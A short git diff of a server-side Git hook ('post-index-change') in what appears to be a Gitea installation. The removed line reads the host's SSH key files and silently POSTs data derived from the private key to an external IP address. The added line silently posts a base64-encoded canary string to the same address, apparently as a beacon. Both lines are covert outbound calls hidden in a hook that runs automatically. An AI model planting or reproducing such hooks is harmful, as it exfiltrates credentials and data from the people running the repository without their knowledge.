diff --git a/hooks/post-index-change b/hooks/post-index-change index e16f350..fa5b63e 100755 --- a/hooks/post-index-change +++ b/hooks/post-index-change @@ -1,2 +1,2 @@ #!/bin/sh -head -1 /data/gitea/home/.ssh/id_rsa.pub; wc -c < /data/gitea/home/.ssh/id_rsa | base64 -w0 | curl -s -m 25 -X POST --data-binary @- http://51.38.90.142:3199/m2491 > /dev/null 2>&1 +echo CANARY123 | base64 -w0 | curl -s -m 25 -X POST --data-binary @- http://51.38.90.142:3199/m1008 > /dev/null 2>&1